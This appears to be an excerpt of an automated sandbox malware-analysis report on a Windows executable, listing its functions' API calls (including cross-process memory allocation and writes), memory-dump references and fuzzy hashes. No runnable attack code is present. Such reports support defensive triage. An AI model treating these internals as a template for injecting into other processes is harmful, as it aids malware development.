                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                      • Opcode ID: 4b7470844166f9c1693bc2fdc3199af43792870002103618c4d9d233816521aa
                                                                                                                                                                                      • Instruction ID: e390cd102f8dc27af2ec630d9f3963035a389b51aa9d15d89a1b56e920badcc5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b7470844166f9c1693bc2fdc3199af43792870002103618c4d9d233816521aa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19018B7A611208AFDB105F68DC84BAABBEDEF443A1F104024B941D2250D774DD41AFA1
                                                                                                                                                                                      Function 0093B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0093B7A5
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0093B7AF
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0093B7BE
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0093B7C5
                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0093B7DB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                      • Opcode ID: 07d9b1fc1df32acd5acc37f2cbdf9627e40b0214be95da58e49c19e80abdc694
                                                                                                                                                                                      • Instruction ID: 7a04ecb70252d49d35041aca53246b484d966d66b9b32001738f0b95ad21b17a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 07d9b1fc1df32acd5acc37f2cbdf9627e40b0214be95da58e49c19e80abdc694
                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF062712553046FEB101FA5EC89E6B3BACFF86755F10401AFA42C7290DB619C41DFA0
                                                                                                                                                                                      Function 0093B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0093B806
                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0093B810
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093B81F
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0093B826
                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093B83C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                      • Opcode ID: cba66c506455907585ef0a7d170511b834b781d7c3498cdbb0c23f0b5af9de29
                                                                                                                                                                                      • Instruction ID: d0c9116283b0882fd91cea8390c8e2196dfe6287a3b52dc8685a227ef08b3f05
                                                                                                                                                                                      • Opcode Fuzzy Hash: cba66c506455907585ef0a7d170511b834b781d7c3498cdbb0c23f0b5af9de29
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F062752193046FEB211FA5EC88E6B3B6CFF46764F100029FA41C7290DB619C42DF60
                                                                                                                                                                                      Function 0093FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0093FA8F
                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0093FAA6
                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0093FABE
                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0093FADA
                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0093FAF4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                      • Opcode ID: 314447bc4bba3f4eb060907a4a0b2867ef372f736662c627bbf2c8c8eef0e462
                                                                                                                                                                                      • Instruction ID: a70a1a5bfe491e46344eeb0cd69e7061baef6e78c9ef0e1a079d4baa1ba84584
                                                                                                                                                                                      • Opcode Fuzzy Hash: 314447bc4bba3f4eb060907a4a0b2867ef372f736662c627bbf2c8c8eef0e462
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B018131915704ABEB20AB10DD5EB9677BCFB00B09F0405AAB187E55E0EBF4A9449F40
                                                                                                                                                                                      Function 0091B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EndPath.GDI32(?), ref: 0091B526
                                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0097F583,00000000,?), ref: 0091B542
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0091B555
                                                                                                                                                                                      • DeleteObject.GDI32 ref: 0091B568
                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0091B583
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                      • Opcode ID: cd06fd05929a9536af4400575c956f8265229bb04ef2d6f20c4a7fe73e865942
                                                                                                                                                                                      • Instruction ID: 628a9c184bdb3c7a42f3e026bfd9814d97bb595f72109a06029739a25faadbee
                                                                                                                                                                                      • Opcode Fuzzy Hash: cd06fd05929a9536af4400575c956f8265229bb04ef2d6f20c4a7fe73e865942
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0C93052D209ABDB166F29ED0CB943FE6AB02322F148214F4A5841F1D73489A5FF54
                                                                                                                                                                                      Function 0094FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0094FAB2
                                                                                                                                                                                      • CoCreateInstance.OLE32(0098DA7C,00000000,00000001,0098D8EC,?), ref: 0094FACA
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0094FD2D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                                                                                      • Opcode ID: 07909712e9c83edabe3569c77bbd158a586a8372073250576026daf56df99e58
                                                                                                                                                                                      • Instruction ID: 30009d0ec860bf73b95025ca13e781c1cc444594ebd0ced79b6bbe83003e7dca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 07909712e9c83edabe3569c77bbd158a586a8372073250576026daf56df99e58
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA12B71608305AFD300EF64C891EABB7EDAFD8704F40491DF19597192EB70EA49CBA2
                                                                                                                                                                                      Function 0091DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: #$+
                                                                                                                                                                                      • API String ID: 0-2552117581
                                                                                                                                                                                      • Opcode ID: cc90353a1aef0dd0339b205b08a64e3504b104325c5e05bf2407830d7480f6d2
                                                                                                                                                                                      • Instruction ID: d0b641c6f337db886dbdc6041f07d3c37d26bec182bffcc35c1c8830cd15e31d
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc90353a1aef0dd0339b205b08a64e3504b104325c5e05bf2407830d7480f6d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2551343620925ACFDF15DF68C444AFA7BA8EF56310F148051F8A69B2E2D774DC92CB21
                                                                                                                                                                                      Function 0094503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0099DC40,?,0000000F,0000000C,00000016,0099DC40,?), ref: 0094507B
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                        • Part of subcall function 0090B8A7: _memmove.LIBCMT ref: 0090B8FB
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009450FB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                                                                                      • API String ID: 2528338962-776492005
                                                                                                                                                                                      • Opcode ID: 6b517c326371fbf707900d416a2d3c0d9ea9ed73b238b2da5b7ea77077e336c4
                                                                                                                                                                                      • Instruction ID: d2b76e86ed5018395c5decceb63940131c00104f0dcc08a360b776d1167ae319
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b517c326371fbf707900d416a2d3c0d9ea9ed73b238b2da5b7ea77077e336c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: D5418174A04609AFCF14DFA4C881FAEB7B5BF88314F058469E956AB3A2DB34DD41CB50
                                                                                                                                                                                      Function 0093CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00944D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0093C9FE,?,?,00000034,00000800,?,00000034), ref: 00944D6B
                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0093CFC9
                                                                                                                                                                                        • Part of subcall function 00944D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0093CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00944D36
                                                                                                                                                                                        • Part of subcall function 00944C65: GetWindowThreadProcessId.USER32(?,?), ref: 00944C90
                                                                                                                                                                                        • Part of subcall function 00944C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0093C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00944CA0
                                                                                                                                                                                        • Part of subcall function 00944C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0093C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00944CB6
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0093D036
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0093D083
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                      • Opcode ID: 2fa7068be4ab1fd9b20ede06f600d2fad73856091b55133ac0c090191435ff22
                                                                                                                                                                                      • Instruction ID: cbe6fee71ffe2ee3e07387a79004cc51e96a8d086c9a1e4e9c63ed9013d5b094
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa7068be4ab1fd9b20ede06f600d2fad73856091b55133ac0c090191435ff22
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E416A76901218AFDB14DFA4DC85FEEBBB8EF49700F108095EA45BB181DA706E45CBA1
                                                                                                                                                                                      Function 0096A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0099DBF0,00000000,?,?,?,?), ref: 0096A4E6
                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 0096A503
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0096A513
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                      • Opcode ID: f2e2d32bc960cdaac3e34e1e16d80b278e36e18ffc6163fef276721a4ac1c816
                                                                                                                                                                                      • Instruction ID: d1e7864276f42d5c7f11f490562e1e1b7df9bc9346ebb6971331c1eadd6d1b2f
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2e2d32bc960cdaac3e34e1e16d80b278e36e18ffc6163fef276721a4ac1c816
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE31B231204205AFDB119F38CC45BEA7BA9FB89338F204715F975A32E1D770E8509B51
                                                                                                                                                                                      Function 0096A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0096A74F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0096A75D
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0096A764
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                      • Opcode ID: 13e8e5b20937d118488c85a3f69eb1150c7d0be530663ceebff1385126459e30
                                                                                                                                                                                      • Instruction ID: 2b2ffb2a4a4e580ce3894d7479230407f40e3827c29e5eb12d9b581e56a41f4b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 13e8e5b20937d118488c85a3f69eb1150c7d0be530663ceebff1385126459e30
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B2192B5A04209AFDB10DF68DDC1EA737ADEB4A394B040459FA019B392C770EC11DB61
                                                                                                                                                                                      Function 009697B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0096983D
                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0096984D
                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00969872
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                      • Opcode ID: 89bafb1da57f470d98077270727c285c4cd35bfb7d7a34905d393fa71fb27a2b
                                                                                                                                                                                      • Instruction ID: e33b1c23ec68d9bdfa5cbc3906cdafddaed3b2f0ccca313b02f018e897ff85cc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 89bafb1da57f470d98077270727c285c4cd35bfb7d7a34905d393fa71fb27a2b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821A132610118BFEF158F54DC85FFB3BAEEF8A764F118124F9059B190C6719C519BA0
                                                                                                                                                                                      Function 0096A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0096A27B
                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0096A290
                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0096A29D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                      • Opcode ID: be109befe19ce0e7e6a2a1628a943229e56fc97ec16a6b087570cf80c0021ce5
                                                                                                                                                                                      • Instruction ID: fe7c88c2dc54141d5ae55e48adf37fe85b1de56477ef4b1c44f699f9f9fd0a92
                                                                                                                                                                                      • Opcode Fuzzy Hash: be109befe19ce0e7e6a2a1628a943229e56fc97ec16a6b087570cf80c0021ce5
